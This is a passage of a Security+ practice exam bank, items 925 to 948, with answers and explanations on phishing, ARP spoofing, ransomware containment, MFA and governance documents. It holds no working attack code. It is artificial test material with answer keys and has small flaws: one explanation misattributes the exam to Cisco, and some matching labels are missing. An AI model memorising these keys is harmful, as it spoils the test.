Option B is wrong because job rotation involves periodically rotating employees through different roles to cross-train and detect irregularities, but it does not prevent a single user from completing the entire vendor creation and payment approval workflow at any given time; fraud could still occur during the current assignment. Option C is wrong because defense in depth is a layered security strategy that uses multiple technical controls (e.g., firewalls, IDS, encryption) to protect against external threats, but it does not address the internal segregation of conflicting duties; adding more technical tools to inspect payment forms would increase complexity without directly preventing the same user from performing both actions.

925
MCQmedium

An EDR alert flags suspicious PowerShell on a finance workstation. Windows logs show the script started immediately after a patch-management tool launched from the software distribution server. The script only queries installed software and writes results to a log file. What is the most likely conclusion?

A.The alert is likely a false positive because the activity matches approved patch-management behavior
B.The workstation is definitely compromised because PowerShell is always malicious
C.The endpoint should be immediately wiped because the script wrote to a log file
D.The software distribution server should be blocked from the network permanently
AnswerA

The script behavior matches a normal inventory or patching task, and the timing with the distribution server supports legitimate administration.

Why this answer

The EDR alert is likely a false positive because the PowerShell script's behavior—querying installed software and writing results to a log file—is consistent with legitimate patch-management inventory tasks. The script's execution immediately after the patch-management tool launched from the software distribution server indicates it was triggered by that tool as part of its normal operations, not by an attacker. Since the activity matches approved patch-management behavior and shows no signs of malicious intent (e.g., data exfiltration, lateral movement, or persistence), the alert should be investigated but is most likely a false positive.

Exam trap

The trap here is that candidates often assume any PowerShell execution is malicious, but the SY0-701 exam tests the ability to correlate process ancestry and script behavior to distinguish legitimate administrative activity from actual threats.

How to eliminate wrong answers

Option B is wrong because it incorrectly assumes PowerShell is always malicious, ignoring that PowerShell is a legitimate administrative tool widely used for automation and inventory tasks in enterprise environments. Option C is wrong because writing to a log file is a standard, non-malicious operation; immediate wiping is an extreme and unnecessary response that would disrupt business operations without evidence of compromise. Option D is wrong because permanently blocking the software distribution server would break critical patch-management workflows; the server is the likely source of the legitimate script, not a threat actor.

926
MCQmedium

A security analyst observes repeated outbound traffic from a single workstation to a known malicious IP address. The workstation's anti-malware software has reported no alerts, and the user claims to have only downloaded software from the company's approved application store. Which type of malware most likely explains this behavior?

A.Ransomware
B.Rootkit
C.Trojan horse
D.Polymorphic malware
AnswerC

Correct. A Trojan horse masquerades as benign software, often from a seemingly trusted source. It can evade signature-based anti-malware and silently establish outbound connections to a malicious IP for command-and-control, data exfiltration, or further payload delivery.

Why this answer

The Trojan horse is correct because it is a type of malware that disguises itself as legitimate software, often downloaded from trusted sources like an approved application store, to bypass security controls. Once installed, it can silently establish outbound connections to a command-and-control (C2) server, such as the known malicious IP address observed, without triggering anti-malware alerts if the Trojan is not yet in the signature database. This matches the scenario where the user downloaded from an approved store, the anti-malware reported no alerts, and the workstation is communicating with a malicious IP.

Exam trap

The trap here is that candidates may confuse a rootkit's stealth capabilities with the Trojan's social engineering vector, overlooking that the approved store download is a classic Trojan delivery method, not a rootkit's typical infection path.

How to eliminate wrong answers

Option A is wrong because ransomware typically announces its presence with a ransom note and encryption of files, not by silently generating repeated outbound traffic to a malicious IP without alerts. Option B is wrong because a rootkit is designed to hide its presence by modifying the operating system kernel or drivers, which would likely evade anti-malware detection but does not inherently explain the user downloading from an approved store; rootkits are usually installed via exploits or bundled with other malware, not typically disguised as a legitimate app from an approved store.

927
MCQmedium

Several users on the same subnet report intermittent inability to reach the default gateway. A packet capture shows ARP replies mapping the gateway IP to a different MAC address, and the same host keeps sending those replies every few seconds. What attack is most likely?

A.Replay attack
B.ARP spoofing
C.DNS amplification
D.Man-in-the-middle via TLS downgrade
AnswerB

ARP spoofing, also called ARP poisoning, forges ARP replies so hosts associate the gateway IP with the attacker MAC address.

Why this answer

The correct answer is B, ARP spoofing. The symptoms—intermittent gateway unreachability, ARP replies mapping the gateway IP to a different MAC address, and repeated unsolicited ARP replies—are classic indicators of an ARP spoofing (also called ARP poisoning) attack. The attacker sends forged ARP replies to associate their own MAC address with the gateway IP, causing traffic destined for the gateway to be sent to the attacker instead, disrupting connectivity.

Exam trap

The trap here is that candidates may confuse ARP spoofing with a man-in-the-middle attack in general, but the question specifically describes ARP-level manipulation (forged ARP replies mapping the gateway IP to a different MAC), which is the defining characteristic of ARP spoofing, not a TLS downgrade or replay attack.

How to eliminate wrong answers

Option A is wrong because a replay attack involves capturing and retransmitting valid data packets (e.g., authentication tokens) to trick a system, not sending forged ARP replies to redirect traffic. Option C is wrong because a DNS amplification attack is a type of DDoS that uses open DNS resolvers to flood a target with large DNS responses, and it does not involve manipulating ARP tables or causing intermittent gateway reachability. Option D is wrong because a man-in-the-middle via TLS downgrade attack forces a connection to use a weaker TLS version or cipher, but it does not involve ARP spoofing or sending forged ARP replies; it operates at the transport/application layer, not the data link layer.

928
MCQeasy

A firewall rule must be changed to allow a vendor update server. Which step best reduces the chance of an unexpected outage?

A.Make the change directly in production without review to save time.
B.Document the change, get approval, and include a rollback plan.
C.Disable the firewall temporarily while the update is tested.
D.Apply the rule but do not tell anyone so there is less paperwork.
AnswerB

This is the best answer because secure change management uses approval and rollback planning to reduce operational risk. Documenting the requested change ensures the impact is reviewed, and a rollback plan gives the team a way to quickly restore service if the update causes problems. These controls help prevent outages caused by rushed or poorly understood production changes.

Why this answer

Option B is correct because following a formal change management process—documenting the change, obtaining approval, and including a rollback plan—ensures that the firewall rule modification is reviewed for potential impacts, authorized by stakeholders, and can be reverted if it causes an outage. This structured approach minimizes the risk of unexpected downtime by validating the change in a controlled manner and providing a safety net.

Exam trap

CompTIA often tests the misconception that speed or convenience (like disabling the firewall or skipping approval) is acceptable for urgent changes, but the exam emphasizes that proper change management is always required to prevent outages and maintain security.

How to eliminate wrong answers

Option A is wrong because making the change directly in production without review bypasses change management, increasing the risk of misconfiguration or unintended access that could cause an outage. Option C is wrong because disabling the firewall temporarily exposes the network to all traffic, creating a security vulnerability and potentially causing a different type of outage from malicious activity. Option D is wrong because applying the rule without notification violates change control policies, prevents stakeholders from preparing for potential impacts, and eliminates the ability to coordinate a rollback if issues arise.

929
MCQmedium

A contractor is assigned to a single merger project. The manager approves access to only the project share and the project chat space, even though the contractor technically could use other collaboration tools. Which principle is most directly reflected?

A.Need-to-know
B.Least privilege
C.Integrity
D.Zero trust
AnswerA

The contractor is given access only to information and resources required for the assigned project work.

Why this answer

The correct answer is A, need-to-know, because the manager restricts the contractor's access to only the project share and project chat space, even though the contractor could technically use other collaboration tools. Need-to-know is a principle that limits access to information or resources strictly required for an individual's job duties, regardless of their clearance or technical capability. In this scenario, the contractor is given access only to the specific resources necessary for the merger project, directly reflecting the need-to-know principle.

Exam trap

Cisco often tests the distinction between need-to-know and least privilege by presenting a scenario where access is limited to specific resources (need-to-know) rather than limiting permissions within a resource (least privilege), causing candidates to confuse the two principles.

How to eliminate wrong answers

Option B (Least privilege) is wrong because least privilege focuses on granting the minimum permissions or rights (e.g., read-only vs. write) to perform a task, not on limiting access to specific resources based on job role. Here, the contractor is denied access to entire tools, not just reduced permissions within them. Option C (Integrity) is wrong because integrity refers to the assurance that data has not been altered or destroyed in an unauthorized manner, typically enforced via hashing (e.g., SHA-256) or access controls like write permissions, not by restricting access to specific collaboration tools.

Option D (Zero trust) is wrong because zero trust is a security model that assumes no implicit trust and requires continuous verification of every access request (e.g., via multifactor authentication and micro-segmentation), not simply limiting access to a project share and chat space based on a single project assignment.

930
MCQhard

Based on the exhibit, which action is required to keep the backups restorable after the key-encryption key rotation?

A.Delete vault-kek-v1 immediately so only the newest key remains active.
B.Rewrap or keep access to the old KEK version until existing DEKs are migrated.
C.Re-encrypt the entire backup repository with a single shared password.
D.Export vault-kek-v2 into the backup files so each object stores the new key directly.
AnswerB

This is correct because the backups still depend on the old key-encryption key to unwrap their data-encryption keys. During key rotation, the organization must either keep the old KEK available or rewrap the DEKs with the new KEK before retiring the old one. That preserves restore capability without forcing a full mass re-encryption of the backup data.

Why this answer

When a key-encryption key (KEK) is rotated, existing data-encryption keys (DEKs) that were wrapped with the old KEK version become unreadable unless the old KEK is retained or the DEKs are re-wrapped with the new KEK. Option B ensures that backups remain restorable by either keeping the old KEK version accessible or migrating DEKs to the new KEK, maintaining the chain of trust for decryption.

Exam trap

The trap here is that candidates assume deleting the old key immediately is a best practice for key hygiene, but they overlook that existing encrypted data depends on the old key for decryption until re-wrapping occurs.

How to eliminate wrong answers

Option A is wrong because deleting vault-kek-v1 immediately would render all existing DEKs that were encrypted with that key permanently unrecoverable, breaking backup restorability. Option C is wrong because re-encrypting the entire backup repository with a single shared password violates the principle of key separation and introduces a single point of failure, as a password compromise would expose all backups. Option D is wrong because exporting vault-kek-v2 into backup files defeats the purpose of key management by storing the key alongside the data, eliminating the security benefit of a separate key hierarchy.

931
MCQeasy

A company wants to make sure it can recover quickly after ransomware, even if the production network is unavailable. Which backup approach is the best choice?

A.Store backups only on the same file server so they are easy to access.
B.Keep an offline copy of backups that is disconnected from production systems.
C.Use a single monthly backup and never test restores to save time.
D.Save backups in the same cloud account using the same admin credentials.
AnswerB

Offline backups are harder for ransomware to encrypt and can support recovery when online systems are unavailable.

Why this answer

Option B is correct because an offline (air-gapped) backup, such as a tape stored in a safe or a disconnected external drive, ensures that ransomware cannot encrypt or delete the backup data. This approach guarantees recoverability even when the production network is completely compromised or unavailable, aligning with the 3-2-1 backup rule (three copies, two media types, one offsite/offline).

Exam trap

The trap here is that candidates may think 'offline' means simply not connected to the internet, but the key is physical or logical disconnection from the production network to prevent ransomware from reaching the backup during an active attack.

How to eliminate wrong answers

Option A is wrong because storing backups on the same file server means they share the same attack surface; ransomware can encrypt or delete them alongside production data, making recovery impossible. Option C is wrong because a single monthly backup without testing restores violates the principle of recovery point objective (RPO) and recovery time objective (RTO); untested backups may be corrupt or incomplete, and the long interval between backups risks significant data loss.

932
MCQeasy

A worker receives a text message from someone claiming to be the company's HR partner. The message says a benefits portal issue will be fixed only if the worker clicks a link and logs in right away. What type of attack is this most likely?

A.Smishing, because the attack is delivered by text message.
B.Watering hole, because the attacker compromised the HR partner's website.
C.Spoofing only, because the attacker copied the HR logo in the message.
D.Port scanning, because the attacker wants to find open services on the phone.
AnswerA

Smishing is phishing through SMS or similar text messaging, often using urgency and a trusted name to steal credentials or redirect victims.

Why this answer

This is smishing because the attack vector is a text message (SMS) that attempts to trick the recipient into clicking a malicious link and providing credentials. Smishing is a form of social engineering that exploits the trust in SMS communications, often impersonating a legitimate entity like HR to create urgency. The goal is credential theft, not technical exploitation of the phone's services.

Exam trap

CompTIA often tests the distinction between the delivery method (SMS = smishing) and the underlying technique (spoofing), so candidates mistakenly choose 'spoofing only' because they see a faked logo or sender ID, ignoring that the attack is defined by its vector.

How to eliminate wrong answers

Option B is wrong because a watering hole attack compromises a website frequently visited by the target group, not by sending a direct text message; the attacker does not compromise the HR partner's website here. Option C is wrong because spoofing alone is a technique (e.g., faking the sender ID or logo), but the full attack is smishing, which includes the social engineering delivery via SMS; the question asks for the attack type, not just one component. Option D is wrong because port scanning is a network reconnaissance technique to find open ports and services, not a method to trick a user into clicking a link via text message.

933
Multi-Selecthard

A virtualization host connects to an access switch through one Ethernet link. It must carry only VLAN 30 for production VMs and VLAN 40 for management VMs. A review finds the link currently accepts every VLAN, uses VLAN 1 as the native VLAN, and a guest VLAN can accidentally be added later. Which two changes best harden the design? Select two.

Select 2 answers
A.Prune the trunk so it carries only VLAN 30 and VLAN 40, not every possible VLAN.
B.Leave the trunk open to all VLANs so future changes require no switch updates.
C.Change the native VLAN to an unused ID to reduce VLAN-hopping and mis-tagging risk.
D.Keep VLAN 1 as the native VLAN because it is the vendor default and easiest to support.
E.Enable dynamic trunk negotiation on the host link so the virtualization server can discover VLANs automatically.
AnswersA, C

Limiting the trunk to the exact VLANs needed reduces the chance of accidental exposure or unauthorized traffic crossing the link. This is both a security and operational control because it makes the path easier to audit and less likely to carry unplanned networks. Trunk pruning is a straightforward hardening step for segmented environments.

Why this answer

Option A is correct because pruning the trunk to carry only VLANs 30 and 40 reduces the attack surface by preventing unauthorized VLANs (like a guest VLAN) from being accidentally added later. This aligns with the principle of least privilege for network segmentation, ensuring only necessary traffic traverses the link.

Exam trap

The trap here is that candidates often assume keeping VLAN 1 as the native VLAN is acceptable because it is the default, but the SY0-701 exam emphasizes changing it to an unused ID to prevent VLAN hopping and mis-tagging risks.

934
MCQmedium

A security analyst is investigating a phishing campaign that specifically targets senior executives in a company. The emails appear to come from the CEO and request urgent wire transfers to a fraudulent account. Which of the following best describes this type of attack?

A.Whaling
B.Spear phishing
C.Vishing
D.Pharming
AnswerA

Correct. Whaling specifically targets senior executives or high-value individuals within an organization, often using urgent or authoritative requests to trick them into transferring money or revealing sensitive information.

Why this answer

This attack is whaling because it specifically targets senior executives (the 'big fish') with a fraudulent email impersonating the CEO to request urgent wire transfers. Whaling is a form of phishing that focuses on high-profile individuals within an organization, leveraging their authority and access to sensitive financial operations. The attack exploits the trust and urgency associated with executive communications to bypass standard security controls.

Exam trap

CompTIA often tests the distinction between whaling and spear phishing, where candidates mistakenly choose spear phishing because they overlook that whaling is a specific subtype targeting executives, not just any individual.

How to eliminate wrong answers

Option B (Spear phishing) is wrong because spear phishing targets specific individuals or groups but does not exclusively focus on senior executives; it is a broader category that includes whaling as a subset. Option C (Vishing) is wrong because vishing uses voice calls or VoIP to deceive victims, not email-based messages. Option D (Pharming) is wrong because pharming redirects users from legitimate websites to fraudulent ones by manipulating DNS or host files, not by sending deceptive emails.

935
MCQmedium

A procurement clerk receives a text message from someone claiming to be a supplier account manager. The message says a recent payment failed and asks the clerk to update bank details through a link to a secure portal. What should the clerk do first?

A.Open the link and compare it with the supplier's branding
B.Reply to the text and ask the sender to confirm the request
C.Verify the request using a known supplier contact method before taking action
D.Forward the message to finance so they can decide whether it is legitimate
AnswerC

Out-of-band verification through a trusted phone number or established contact path is the safest way to confirm legitimacy.

Why this answer

Option C is correct because the clerk should independently verify the request using a known supplier contact method (e.g., a phone number on file) before taking any action. This prevents falling victim to a social engineering attack, such as a phishing or business email compromise (BEC) attempt, where the attacker spoofs the sender's identity to redirect payments. Verifying through an out-of-band channel ensures the request is legitimate, as the link in the message could lead to a credential-harvesting site or malware download.

Exam trap

The trap here is that candidates may choose Option D, thinking that forwarding to finance is a safe escalation, but the SY0-701 exam emphasizes that the first step is always independent verification using a trusted method, not delegating or relying on the suspicious communication channel.

How to eliminate wrong answers

Option A is wrong because opening the link and comparing branding is unsafe; the link could lead to a lookalike domain that mimics the supplier's portal, and merely comparing branding does not verify the sender's identity or the link's authenticity, as attackers can easily replicate logos and styles. Option B is wrong because replying to the text allows the attacker to continue the social engineering; the reply goes to the same compromised channel, and the attacker can simply confirm the request, providing no real verification. Option D is wrong because forwarding the message to finance shifts responsibility without verifying the request first; finance may also be deceived by the same spoofed message, and the clerk should independently verify before escalating.

936
MCQmedium

Based on the exhibit, which document should be updated first to reflect the new ticketing platform while keeping approval requirements unchanged?

A.Policy, because every tool change requires rewriting the corporate mandate.
B.Standard, because the approval workflow and evidence rules are still the same.
C.Procedure, because the step-by-step instructions and screenshots are now outdated.
D.Guideline, because optional content should always be revised before mandatory content.
AnswerC

Procedures contain the operational steps people follow to complete a task. Since the workflow and approval rules remain the same but the tool interface changed, the step-by-step guide should be updated first. That keeps the control intent intact while preventing user confusion and process errors.

Why this answer

The procedure document contains the step-by-step instructions, including screenshots and specific commands for the old ticketing platform. Since the new platform changes the user interface and workflow steps, the procedure must be updated first to ensure technicians can follow accurate instructions. Policies and standards define high-level rules and approval requirements, which remain unchanged, so they do not need immediate revision.

Exam trap

The trap here is that candidates confuse 'procedure' with 'standard' or 'policy,' assuming any tool change requires updating the highest-level document, when in fact only the detailed implementation steps (procedure) need revision if the rules and requirements remain unchanged.

How to eliminate wrong answers

Option A is wrong because a policy is a high-level mandate that sets overall direction and requirements; changing a specific tool does not automatically require rewriting the entire policy, especially when approval requirements stay the same. Option B is wrong because a standard defines mandatory rules and baselines (e.g., evidence retention periods), and while the approval workflow and evidence rules are unchanged, the standard does not include the step-by-step instructions that are now outdated. Option D is wrong because a guideline is optional and non-binding; revising optional content before mandatory content is not a priority, and the question specifically asks for the document that should be updated first to reflect the new platform.

937
MCQhard

Based on the exhibit, which control would most effectively reduce the remaining successful attacks? Phishing awareness results: Team A: click rate 8%, report rate 6%, median report time 52 min Team B: click rate 7%, report rate 18%, median report time 14 min Team C: click rate 12%, report rate 21%, median report time 10 min Incident summary: Team C had one mailbox takeover after a user approved an MFA push while traveling.

A.Continue generic awareness posters without changing technical controls.
B.Replace push-based MFA with phishing-resistant MFA and reinforce verification for unusual login prompts.
C.Disable MFA on mobile devices so users can log in faster.
D.Allow employees to approve prompts from any device to reduce help desk calls.
AnswerB

Phishing-resistant MFA blocks prompt abuse, and verification steps help users resist social engineering during abnormal sign-in events.

Why this answer

Team C's successful attack was a mailbox takeover resulting from a user approving an MFA push notification while traveling. This indicates that push-based MFA is vulnerable to MFA fatigue attacks, where an attacker bombards the user with prompts until they approve. Replacing push-based MFA with phishing-resistant MFA (e.g., FIDO2/WebAuthn or hardware tokens) eliminates the possibility of approving a prompt from an untrusted device, and reinforcing verification for unusual login prompts adds a critical user behavior layer to detect anomalies.

Exam trap

CompTIA often tests the misconception that any MFA is equally secure; the trap here is that candidates may think push-based MFA is sufficient because it is 'multi-factor,' but the exam expects you to recognize that push-based MFA is vulnerable to fatigue attacks and that phishing-resistant MFA is the appropriate technical control to prevent such successful attacks.

How to eliminate wrong answers

Option A is wrong because generic awareness posters do not address the specific technical vulnerability of push-based MFA being susceptible to fatigue attacks; they are too vague and have already proven ineffective given Team C's high click rate and the successful attack. Option C is wrong because disabling MFA on mobile devices would remove the only authentication factor for mobile users, drastically increasing the risk of account compromise from stolen credentials or session hijacking. Option D is wrong because allowing employees to approve prompts from any device would exacerbate MFA fatigue by removing location/device context, making it easier for attackers to trick users into approving malicious requests.

938
Matchingeasy

Match each cryptographic concept to its best purpose.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Makes data unreadable to anyone who does not have the correct key.

Creates a fixed-size fingerprint to detect whether data changed.

Adds random data before hashing passwords so identical passwords look different.

Lets others verify who signed the file and that it was not altered.

Replaces an encryption key before its approved lifetime ends.

Why these pairings

Confidentiality protects secrecy, integrity prevents tampering, authentication confirms identity, non-repudiation ensures proof of origin, availability ensures uptime, and accountability enables audit trails.

939
MCQeasy

A SOC analyst sees 20 failed logins for one user account, followed by a successful login 30 seconds later from the same office subnet. The user confirms they mistyped the password several times. What is the best conclusion?

A.It is definitely a brute-force attack and should be treated as confirmed compromise.
B.It is most likely a false positive caused by user error and should be documented after verification.
C.It is evidence of malware on the user's workstation until the device is rebuilt.
D.It proves the password was changed by an attacker and the account must be disabled immediately.
AnswerB

The failed logins match the user's explanation and the location is consistent with normal behavior.

Why this answer

The scenario shows 20 failed logins followed by a successful login from the same office subnet, and the user confirms they mistyped the password. This pattern is consistent with user error (e.g., Caps Lock or typo), not an automated brute-force attack, which would typically show a much higher volume of attempts from diverse IPs. The best conclusion is a false positive, which should be documented after verification to maintain accurate incident records.

Exam trap

The trap here is that candidates may overreact to multiple failed logins as a brute-force attack, ignoring the user's confirmation and the same-subnet source, which are classic indicators of user error rather than malicious activity.

How to eliminate wrong answers

Option A is wrong because a brute-force attack would involve hundreds or thousands of attempts from multiple IP addresses, not just 20 from the same subnet, and a successful login from the user's own subnet with user confirmation of error makes an attack unlikely. Option C is wrong because there is no evidence of malware; failed logins followed by a successful login from the same subnet are not indicative of malware activity, and rebuilding the device is an extreme, unnecessary response. Option D is wrong because the successful login occurred from the same office subnet, not an attacker's IP, and the user confirmed they mistyped the password; there is no evidence the password was changed, and disabling the account would be premature without further investigation.

940
MCQhard

Based on the exhibit, which action should the security team prioritize next?

A.Send a company-wide reminder to never click links in email, regardless of sender.
B.Focus only on punitive action for users who failed the simulation.
C.Run the same broad awareness module again for all employees at the same time.
D.Deploy role-based phishing training, recurring simulations, and a simple reporting workflow.
AnswerD

The metrics show that departments with the most realistic, job-specific lures are clicking more often and reporting less frequently. Role-based training addresses the exact patterns employees encounter, while recurring simulations let the security team measure improvement over time. A clear reporting workflow also increases the chance that suspicious messages reach security quickly for validation and containment.

Why this answer

Option D is correct because the exhibit (not shown here, but implied by the question) likely shows that a phishing simulation has been completed and that the organization needs to move from a one-size-fits-all awareness approach to a sustainable, role-based security training program. Deploying role-based phishing training, recurring simulations, and a simple reporting workflow addresses the root cause of user susceptibility by tailoring content to specific job functions, reinforcing learning through repetition, and enabling users to report suspicious emails easily, which aligns with NIST SP 800-50 and the continuous improvement cycle of security awareness programs.

Exam trap

The trap here is that candidates often choose a quick, one-time fix (like a company-wide reminder or repeating the same module) instead of recognizing that effective security awareness requires a continuous, role-based, and measurable program with a reporting mechanism, which is a core concept in Security Program Management and Oversight for SY0-701.

How to eliminate wrong answers

Option A is wrong because a company-wide reminder to never click links in email is overly broad, unrealistic for daily work, and does not address the need for role-specific training or a reporting mechanism; it also ignores that some legitimate business email requires clicking links. Option B is wrong because focusing only on punitive action for users who failed the simulation is counterproductive, as it discourages reporting and learning, and does not address the systemic need for improved training and a positive security culture. Option C is wrong because running the same broad awareness module again for all employees at the same time fails to provide role-based customization, does not incorporate recurring simulations to reinforce learning, and lacks a simple reporting workflow, which are essential for effective phishing defense as recommended by industry frameworks like the SANS Security Awareness Maturity Model.

941
MCQmedium

A security team is defining the minimum approved configuration for all new Linux web servers. The document must require specific logging settings, approved packages, and disabled services, and administrators must check servers against it during audits. Which governance artifact best fits this need?

A.Guideline, because it suggests recommended settings without requiring enforcement.
B.Baseline, because it defines the minimum approved configuration that systems should meet.
C.Policy, because it is the high-level statement of intent for the organization.
D.Procedure, because it explains the exact steps to install and configure each server.
AnswerB

A baseline is the correct artifact when an organization wants a documented, measurable starting configuration for systems. It captures the approved minimum settings, such as required services, logging, and packages, and supports consistent builds and compliance checks. Because the question describes a configuration that administrators will audit against, a baseline fits better than a guideline or a general policy.

Why this answer

A baseline is the correct governance artifact because it defines the minimum approved configuration that systems must meet, including specific logging settings, approved packages, and disabled services. In the context of Linux web servers, a baseline ensures consistent security posture by providing a measurable standard that administrators can audit against, such as verifying that rsyslog is configured for remote logging, only packages like Apache or Nginx from approved repositories are installed, and services like Telnet or FTP are disabled. This aligns with the requirement for enforcement and auditability, unlike a guideline which is merely advisory.

Exam trap

The trap here is that candidates confuse 'policy' with 'baseline' because both are governance documents, but a policy is a broad directive (e.g., 'secure all systems') while a baseline provides the specific, auditable technical controls (e.g., 'disable Telnet, enable auditd, use only Apache 2.4') that administrators must enforce.

How to eliminate wrong answers

Option A is wrong because a guideline suggests recommended settings without requiring enforcement, but the scenario explicitly requires administrators to check servers against the document during audits, implying mandatory compliance. Option C is wrong because a policy is a high-level statement of intent (e.g., 'all servers must be secure') that lacks the specific technical details (e.g., exact logging settings, package lists, disabled services) needed for a configuration audit; a baseline operationalizes policy into measurable technical requirements.

942
MCQmedium

A SOC analyst confirms that an employee entered credentials into a phishing site and that the mailbox now shows a new forwarding rule sending messages to an external address. The account is still signed in on a laptop and a mobile phone. What is the best next action?

A.Wait for the user to log out naturally before taking action.
B.Revoke active sessions and force a password reset for the account.
C.Archive the mailbox and close the ticket after notifying the user.
D.Delete the forwarding rule only and consider the incident closed.
AnswerB

This removes the attacker’s current access path and prevents reuse of the compromised credentials.

Why this answer

Option B is correct because the immediate priority is to contain the compromised account by terminating all active sessions (revoking OAuth tokens, clearing SAML sessions) and forcing a password reset to prevent further unauthorized access. The mailbox forwarding rule indicates the attacker has established persistence, and the active sessions on the laptop and mobile phone mean the attacker could still be using the account. Revoking sessions ensures the attacker cannot continue exfiltration or lateral movement, while the password reset invalidates the stolen credentials.

Exam trap

The trap here is that candidates may think waiting for the user to log out (Option A) is acceptable because the user is still signed in, but in security operations, you must assume the attacker has active access and act immediately to revoke sessions rather than relying on user behavior.

How to eliminate wrong answers

Option A is wrong because waiting for the user to log out naturally gives the attacker continued access to the account, allowing further data exfiltration via the forwarding rule or other malicious actions. Option C is wrong because archiving the mailbox and closing the ticket without revoking sessions or resetting the password leaves the account compromised, the forwarding rule active, and the attacker still able to access the account and modify settings.

943
MCQhard

Employees use a browser-based SaaS portal, a native expense app, and an internal API. The company wants one corporate identity, API access without separate passwords, and automatic account removal when HR disables a user. Which solution best fits?

A.Use LDAP binds directly against each application and manage local passwords separately.
B.Use OpenID Connect federation with OAuth 2.0 access tokens and SCIM provisioning.
C.Use shared local accounts in each application and sync passwords nightly from the directory.
D.Use Kerberos constrained delegation to each vendor tenant for every application.
AnswerB

OIDC handles modern sign-in across browser and mobile experiences, OAuth supports API access, and SCIM automates provisioning and deprovisioning.

Why this answer

OpenID Connect (OIDC) federation with OAuth 2.0 provides a single corporate identity (federated SSO), allows API access without separate passwords (using access tokens), and SCIM provisioning automates account removal when HR disables a user. This combination meets all three requirements: unified identity, passwordless API access, and lifecycle management.

Exam trap

The trap here is that candidates often confuse LDAP or Kerberos (both legacy on-premises protocols) with modern cloud federation, failing to recognize that OIDC + OAuth 2.0 + SCIM is the only combination that provides SSO, token-based API access, and automated provisioning for SaaS and native apps.

How to eliminate wrong answers

Option A is wrong because LDAP binds require separate password management per application and do not provide API access without passwords, nor do they support automatic account removal via SCIM. Option C is wrong because shared local accounts with nightly password sync violate the requirement for a single corporate identity and do not enable API access without passwords; they also lack automatic provisioning/deprovisioning. Option D is wrong because Kerberos constrained delegation is designed for on-premises Windows environments and does not federate to browser-based SaaS or native apps, nor does it support SCIM-based lifecycle management.

944
MCQmedium

A SOC analyst confirms that a workstation is encrypting local files and attempting SMB connections to nearby hosts. The user is still logged in, and the business wants to limit spread without destroying evidence. What is the best immediate action?

A.Power the workstation off immediately and leave it in place
B.Quarantine the workstation from the network using EDR or switch port containment
C.Run a full antivirus scan while the workstation remains connected
D.Wipe and reimage the workstation from a standard build image
AnswerB

This is the best immediate containment action because it stops further spread while preserving evidence. EDR quarantine or disabling the switch port isolates the infected host without unnecessarily powering it down. The SOC can then collect volatile and disk evidence, determine the scope of infection, and proceed with eradication and recovery steps in the proper incident response sequence.

Why this answer

Option B is correct because quarantining the workstation via EDR or switch port containment immediately stops the SMB-based lateral movement and further encryption of network shares, while preserving the volatile evidence (memory, running processes, encryption keys) for forensic analysis. This aligns with the business requirement to limit spread without destroying evidence, as powering off or reimaging would lose critical forensic data.

Exam trap

The trap here is that candidates think powering off (Option A) is the fastest way to stop spread, but CompTIA emphasizes preserving evidence and avoiding destruction of volatile data, making network quarantine the correct choice.

How to eliminate wrong answers

Option A is wrong because powering off the workstation destroys volatile evidence (e.g., encryption keys in memory, active network connections) and may trigger anti-forensic mechanisms in the ransomware. Option C is wrong because running a full antivirus scan while the workstation remains connected allows the ransomware to continue encrypting local files and spreading via SMB to nearby hosts, violating the goal to limit spread. Option D is wrong because wiping and reimaging destroys all evidence, including the ransomware binary, encryption artifacts, and forensic traces needed for incident response and attribution.

945
MCQeasy

A company needs a public website that anyone on the internet can reach, but the application and database servers must stay off the internet. Where should the web server be placed?

A.On the internal user network with the database server.
B.In a DMZ separated from the internal application and database networks.
C.On the same subnet as the firewall management interface.
D.Directly on the database subnet so performance is faster.
AnswerB

A DMZ is the best choice because it allows public access to the web server while keeping the application and database tiers behind additional security controls. If the web server is compromised, the attacker still has to cross another boundary to reach internal systems. This layered zoning is a standard architecture pattern for public-facing services and helps contain risk.

Why this answer

The web server must be placed in a DMZ (demilitarized zone) because this network segment is designed to host publicly accessible services while isolating them from internal networks. The DMZ allows inbound traffic from the internet to the web server, but the application and database servers remain on internal networks with strict firewall rules that block direct internet access, enforcing a layered security architecture.

Exam trap

The trap here is that candidates often confuse a DMZ with a 'public subnet' and think placing the web server directly on the internet-facing side of the firewall is sufficient, but the DMZ is a separate, isolated network segment that enforces strict traffic inspection and prevents direct lateral movement to internal resources.

How to eliminate wrong answers

Option A is wrong because placing the web server on the internal user network with the database server would expose both to direct internet traffic, violating the requirement to keep application and database servers off the internet and creating a single point of compromise. Option C is wrong because the firewall management interface subnet is a highly restricted administrative network; placing a public web server there would expose management interfaces to attack and violate security best practices. Option D is wrong because placing the web server directly on the database subnet would allow internet traffic to reach the database server directly, bypassing the application layer and defeating the purpose of network segmentation.

946
Matchingeasy

Match each control category to the best example.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

A firewall blocks unauthorized inbound traffic.

A written policy requires manager approval before access is granted.

A badge reader controls entry to a server room.

A SIEM alert notifies the SOC about a failed login pattern.

Restoring a system from a known-good backup after a failure.

Why these pairings

Control categories are matched to examples: preventive controls block, detective controls identify, corrective controls fix, deterrent controls discourage, compensating controls provide alternatives, and directive controls set rules.

947
Multi-Selecthard

A Linux operations team must run a nightly maintenance workflow on 60 servers to rotate logs and restart one service. Security does not allow interactive root logins, and every execution must be auditable. Which two practices best support secure administration? Select two.

Select 2 answers
A.Use a dedicated service account with sudo rights limited to the exact commands in the workflow.
B.Run the workflow through a centralized automation platform that records execution time and output.
C.Hardcode the root password in the script so the same job works everywhere.
D.Share one privileged SSH key among all administrators for convenience.
E.Disable command logging so the maintenance output is easier to review.
AnswersA, B

Least-privilege sudo access lets the job run without giving the account broad interactive root power.

Why this answer

Option A is correct because using a dedicated service account with sudo rights limited to the exact commands in the workflow enforces the principle of least privilege. This ensures that even if the account is compromised, an attacker can only execute the specific log rotation and service restart commands, not arbitrary root-level operations. It also eliminates the need for interactive root logins, satisfying the security policy while maintaining auditability through sudo logs.

Exam trap

The trap here is that candidates often think hardcoding credentials or sharing keys is acceptable for convenience, but the SY0-701 exam strictly tests the principle of least privilege and the necessity of non-repudiation through dedicated accounts and centralized logging.

948
Multi-Selectmedium

A security analyst is reviewing the organization's incident response procedures. According to the NIST SP 800-61 framework, which four of the following are recognized phases of the incident response lifecycle? (Choose four.)

Select 4 answers
.Preparation
.Detection and Analysis
.Containment, Eradication, and Recovery
.Post-Incident Activity
